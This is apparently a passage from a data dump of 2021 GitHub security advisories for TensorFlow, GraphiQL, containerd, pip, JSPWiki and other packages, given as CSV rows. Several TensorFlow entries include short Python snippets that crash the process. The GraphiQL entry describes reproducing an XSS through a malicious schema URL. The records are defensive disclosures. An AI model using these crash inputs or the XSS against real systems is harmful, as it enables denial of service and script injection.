+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vwhq-49r4-gj9v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41214'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:24:08Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-r28h-x6hv-2fq3,2021-11-15T14:43:04Z,2021-11-10T20:48:00Z,,['CVE-2021-43570'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank Java ECDSA library (ecdsa-java) 1.0.0 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.starkbank:starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43570'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/pull/16'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/commit/ed22e484186d6c66d3686bfe39d01bdbabf219b6'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-java'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:25:02Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}"
+1.4.0,GHSA-x4r7-m2q9-69c8,2021-11-04T19:36:52Z,2021-11-08T18:03:50Z,,['CVE-2021-41248'],GraphiQL introspection schema template injection attack," - [1. Impact](#11-impact)
+ - [2. Scope](#12-scope)
+ - [3. Patches](#13-patches)
+ - [3.1 CDN bundle implementations may be automatically patched](#131-cdn-bundle-implementations-may-be-automatically-patched)
+ - [4. Workarounds for Older Versions](#14-workarounds-for-older-versions)
+ - [5. How to Re-create the Exploit](#15-how-to-re-create-the-exploit)
+ - [6. Credit](#16-credit)
+ - [7. References](#17-references)
+ - [8. For more information](#18-for-more-information)
+
+This is a security advisory for an XSS vulnerability in `graphiql`.
+
+A similar vulnerability affects `graphql-playground`, a fork of `graphiql`. There is a corresponding `graphql-playground` [advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw).
+
+## 1. Impact
+
+All versions of `graphiql` older than [`graphiql@1.4.7`](https://github.com/graphql/graphiql/releases/tag/v1.4.7) are vulnerable to compromised HTTP schema introspection responses or `schema` prop values with malicious GraphQL type names, exposing a dynamic XSS attack surface that can allow code injection on operation autocomplete.
+
+In order for the attack to take place, the user must load a vulnerable schema in `graphiql`. There are a number of ways that can occur.
+
+By default, the schema URL is _not_ attacker-controllable in `graphiql` or in its suggested implementations or examples, leaving only very complex attack vectors.
+
+If a custom implementation of `graphiql`'s `fetcher` allows the schema URL to be set dynamically, such as a URL query parameter like `?endpoint=` in `graphql-playground`, or a database provided value, then this custom `graphiql` implementation is _vulnerable to phishing attacks_, and thus much more readily available, low or no privelege level xss attacks. The URLs could look like any generic looking graphql schema URL.
+
+Because this exposes an XSS attack surface, it would be possible for a threat actor to exfiltrate user credentials, data, etc. using arbitrary malicious scripts, without it being known to the user.
+
+## 2. Scope
+
+This advisory describes the impact on the `graphiql` package. The vulnerability also affects other projects forked from `graphiql` such as [`graphql-playground`](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and the `graphql-playground` fork distributed by Apollo Server. The impact is more severe in the `graphql-playground` implementations; see the [`graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7) and [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw) for details.
+
+This vulnerability does not impact `codemirror-graphql`, `monaco-graphql` or other dependents, as it exists in `onHasCompletion.ts` in `graphiql`. It does impact all forks of `graphiql`, and every released version of `graphiql`.
+
+It should be noted that desktop clients such as Altair, Insomnia, Postwoman, do not appear to be impacted by this.
+
+## 3. Patches
+
+`graphiql@1.4.7` addresses this issue via defense in depth.
+
+- **HTML-escaping text** that should be treated as text rather than HTML. In most of the app, this happens automatically because React escapes all interpolated text by default. However, one vulnerable component uses the unsafe `innerHTML` API and interpolated type names directly into HTML. We now properly escape that type name, which fixes the known vulnerability.
+
+- **Validates the schema** upon receiving the introspection response or schema changes. Schemas with names that violate the GraphQL spec will no longer be loaded. (This includes preventing the Doc Explorer from loading.) This change is also sufficient to fix the known vulnerability. You can disable this validation by setting `dangerouslyAssumeSchemaIsValid={true}`, which means you are relying only on escaping values to protect you from this attack.
+
+- **Ensuring that user-generated HTML is safe**. Schemas can contain Markdown in `description` and `deprecationReason` fields, and the web app renders them to HTML using the `markdown-it` library. As part of the development of `graphiql@1.4.7`, we verified that our use of `markdown-it` prevents the inclusion of arbitrary HTML. We use `markdown-it` without setting `html: true`, so we are comfortable relying on [`markdown-it`'s HTML escaping](https://github.com/markdown-it/markdown-it/blob/master/docs/security.md) here. We considered running a second level of sanitization over all rendered Markdown using a library such as `dompurify` but believe that is unnecessary as `markdown-it`'s sanitization appears to be adequate. `graphiql@1.4.7` does update to the latest version of `markdown-it` (v12, from v10) so that any security fixes in v11 and v12 will take effect.
+
+### 3.1 CDN bundle implementations may be automatically patched
+
+Note that if your implementation is depending on a CDN version of `graphiql`, and is pointed to the `latest` tag (usually the default for most cdns if no version is specified) then this issue is already mitigated, in case you were vulnerable to it before.
+
+## 4. Workarounds for Older Versions
+
+If you cannot use `graphiql@1.4.7` or later
+
+- Always use a static URL to a trusted server that is serving a trusted GraphQL schema.
+
+- If you have a custom implementation that allows using user-provided schema URLs via a query parameter, database value, etc, you must either disable this customization, or only allow trusted URLs.
+
+## 5. How to Re-create the Exploit
+
+You can see an example on [codesandbox](https://codesandbox.io/s/graphiql-xss-exploit-gr22f?file=/src/App.js). These are both fixed to the last `graphiql` release `1.4.6` which is the last vulnerable release; however it would work with any previous release of `graphiql`.
+
+Both of these examples are meant to demonstrate the phishing attack surface, so they are customized to accept a `url` parameter. To demonstrate the phishing attack, add `?url=https://graphql-xss-schema.netlify.app/graphql` to the in-codesandbox browser.
+
+Erase the contents of the given query and type `{u`. You will see an alert window open, showing that attacker-controlled code was executed.
+
+Note that when React is in development mode, a validation exception is thrown visibly; however that exception is usually buried in the browser console in a production build of `graphiql`. This validation exception comes from `getDiagnostics`, which invokes `graphql` `validate()` which in turn will `assertValidSchema()`, as `apollo-server-core` does on executing each operation. This validation does not prevent the exploit from being successful.
+
+Note that something like the `url` parameter is not required for the attack to happen if `graphiql`'s `fetcher` is configured in a different way to communicate with a compromised GraphQL server.
+
+## 6. Credit
+
+This vulnerability was discovered by [@Ry0taK](https://github.com/Ry0taK), thank you! :1st_place_medal:
+
+Others who contributed:
+
+- [@imolorhe](https://github.com/imolorhe)
+- [@glasser](https://github.com/glasser)
+- [@divyenduz](https://github.com/divyenduz)
+- [@dotansimha](https://github.com/dotansimha)
+- [@acao](https://github.com/acao)
+- [@benjie](https://github.com/benjie) and many others who provided morale support
+
+## 7. References
+
+**The vulnerability has always been present**
+
+[In the first commit](https://github.com/graphql/graphiql/commit/b9dec272d89d9c590727fd10d62e4a47e0317fc7#diff-855b77f6310b7e4fb1bcac779cd945092ed49fd759f4684ea391b45101166437R87)
+
+[And later moved to onHasCompletion.js in 2016](https://github.com/graphql/graphiql/commit/6701b0b626e43800e32413590a295e5c1e3d5419#diff-d45eb76aebcffd27d3a123214487116fa95e0b5a11d70a94a0ce3033ce09f879R110) (now `.ts` after the typescript migration)
+
+## 8. For more information
+
+If you have any questions or comments about this advisory:
+
+- Open an issue in [graphiql repo](https://github.com/graphql/graphiql/new/issues)
+- Read [more details](https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability) on the vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'graphiql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '1.4.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41248'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/6701b0b626e43800e32413590a295e5c1e3d5419#diff-d45eb76aebcffd27d3a123214487116fa95e0b5a11d70a94a0ce3033ce09f879R110'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/b9dec272d89d9c590727fd10d62e4a47e0317fc7#diff-855b77f6310b7e4fb1bcac779cd945092ed49fd759f4684ea391b45101166437R87'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/commit/cb237eeeaf7333c4954c752122261db7520f7bf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/graphql/graphiql'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T18:11:46Z', 'nvd_published_at': '2021-11-04T21:15:00Z'}"
+1.4.0,GHSA-5hx2-qx8j-qjqm,2021-11-08T22:51:41Z,2021-11-10T19:33:24Z,,['CVE-2021-41199'],Overflow/crash in `tf.image.resize` when size is large,"### Impact
+If `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow.
+
+```python
+import tensorflow as tf
+import numpy as np
+
+tf.keras.layers.UpSampling2D(
+ size=1610637938,
+ data_format='channels_first',
+ interpolation='bilinear')(np.ones((5,1,1,1)))
+```
+
+The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process.
+
+### Patches
+We have patched the issue in GitHub commit [e5272d4204ff5b46136a1ef1204fc00597e21837](https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837) (merging [#51497](https://github.com/tensorflow/tensorflow/pull/51497)).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46914).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41199'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46914'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:51:41Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-5j5w-g665-5m35,2023-03-30T14:50:04Z,2021-11-18T16:08:58Z,,[],Ambiguous OCI manifest parsing,"### Impact
+
+In the OCI Distribution Specification version 1.0.0 and prior and in the OCI Image Specification version 1.0.1 and prior, manifest and index documents are ambiguous without an accompanying Content-Type HTTP header. Versions of containerd prior to 1.4.12 and 1.5.8 treat the Content-Type header as trusted and deserialize the document according to that header. If the Content-Type header changed between pulls of the same ambiguous document (with the same digest), the document may be interpreted differently, meaning that the digest alone is insufficient to unambiguously identify the content of the image.
+
+### Patches
+
+This issue has been fixed in containerd 1.4.12 and 1.5.8. Image pulls for manifests that contain a “manifests” field or indices which contain a “layers” field are rejected.
+
+### Workarounds
+
+Ensure you only pull images from trusted sources.
+
+### References
+
+https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m
+https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
+* Email us at [security@containerd.io](mailto:security@containerd.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-5j5w-g665-5m35'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/26c76a3014e71af5ad2f396ec76e0e0ecc8e25a3'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/db00065a969a983ceb0a409833f93f705f284ea4'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.12'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.8'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T14:43:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5crj-c72x-m7gq,2021-11-08T22:12:27Z,2021-11-10T18:55:11Z,,['CVE-2021-41217'],Null pointer exception when `Exit` node is not preceded by `Enter` op,"### Impact
+The [process of building the control flow graph](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/common_runtime/immutable_executor_state.cc#L284-L346) for a TensorFlow model is vulnerable to a null pointer exception when nodes that should be paired are not:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def func():
+ return tf.raw_ops.Exit(data=[False,False])
+
+func()
+```
+
+This occurs because the code assumes that the first node in the pairing (e.g., an `Enter` node) always exists when encountering the second node (e.g., an `Exit` node):
+
+```cc
+ ...
+} else if (IsExit(curr_node)) {
+ // Exit to the parent frame.
+ parent = parent_nodes[curr_id];
+ frame_name = cf_info->frame_names[parent->id()];
+ ...
+```
+
+When this is not the case, `parent` is `nullptr` so dereferencing it causes a crash.
+
+### Patches
+We have patched the issue in GitHub commit [05cbebd3c6bb8f517a158b0155debb8df79017ff](https://github.com/tensorflow/tensorflow/commit/05cbebd3c6bb8f517a158b0155debb8df79017ff).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5crj-c72x-m7gq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41217'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/05cbebd3c6bb8f517a158b0155debb8df79017ff'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:12:27Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-5xp3-jfq3-5q8x,2021-11-17T21:23:42Z,2021-11-15T17:45:01Z,,['CVE-2021-3572'],Improper Input Validation in pip,A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3572'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/pull/9827'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2021:3254'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1962856'}, {'type': 'PACKAGE', 'url': 'https://github.com/pypa/pip'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/162712/USN-4961-1.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:41:47Z', 'nvd_published_at': '2021-11-10T18:15:00Z'}"
+1.4.0,GHSA-8gw6-w5rw-4g5c,2021-11-30T14:44:44Z,2021-11-29T17:59:24Z,,['CVE-2021-44140'],Incorrect Default Permissions in Apache JSPWiki,"Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance, versions up to 2.11.0.M8, by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance. Apache JSPWiki users should upgrade to 2.11.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44140'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/jspwiki'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-44140'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/5qglpjdhvobppx7j550lf1sk28f6011t'}]","{'cwe_ids': ['CWE-276'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-25T00:25:46Z', 'nvd_published_at': '2021-11-24T12:15:00Z'}"
+1.4.0,GHSA-hgc3-hp6x-wpgx,2021-11-17T21:17:29Z,2021-11-03T17:36:22Z,,['CVE-2021-3840'],Antilles Dependency Confusion Vulnerability,"### Potential Impact:
+Remote code execution.
+
+### Scope of Impact:
+Open-source project specific.
+
+### Summary Description:
+A dependency confusion vulnerability was reported in the Antilles open-source software prior to version 1.0.1 that could allow for remote code execution during installation due to a package listed in requirements.txt not existing in the public package index (PyPi).
+MITRE classifies this weakness as an Uncontrolled Search Path Element (CWE-427) in which a private package dependency may be replaced by an unauthorized package of the same name published to a well-known public repository such as PyPi.
+The configuration has been updated to only install components built by Antilles, removing all other public package indexes. Additionally, the antilles-tools dependency has been published to PyPi.
+
+### Mitigation Strategy for Customers (what you should do to protect yourself):
+Remove previous versions of Antilles as a precautionary measure and Update to version 1.0.1 or later.
+
+### Acknowledgement:
+The Antilles team thanks Kotko Vladyslav for reporting this issue.
+
+### References:
+https://github.com/lenovo/Antilles/commit/c7b9c5740908b343aceefe69733d9972e64df0b9
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'antilles-tools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lenovo/Antilles/security/advisories/GHSA-hgc3-hp6x-wpgx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3840'}, {'type': 'WEB', 'url': 'https://github.com/lenovo/Antilles/commit/c7b9c5740908b343aceefe69733d9972e64df0b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/lenovo/Antilles'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T15:04:04Z', 'nvd_published_at': '2021-11-12T22:15:00Z'}"
+1.4.0,GHSA-c65v-p733-9796,2021-11-22T18:39:54Z,2021-11-23T18:17:33Z,,['CVE-2021-3961'],Cross-site Scripting in snipe/snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3961'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/7ce5993f5ae9d713a0955c2fd8e2dff7a7ce886e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5987aed5-6613-4937-8a3e-d48009b7da10'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:39:54Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}"
+1.4.0,GHSA-2p25-55c9-h58q,2021-11-08T22:53:02Z,2021-11-10T19:33:58Z,,['CVE-2021-41198'],Overflow/crash in `tf.tile` when tiling tensor is large,"### Impact
+If `tf.tile` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow.
+
+```python
+import tensorflow as tf
+import numpy as np
+tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000])
+```
+
+The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process.
+
+### Patches
+We have patched the issue in GitHub commit [9294094df6fea79271778eb7e7ae1bad8b5ef98f](https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f) (merging [#51138](https://github.com/tensorflow/tensorflow/pull/51138)).
+
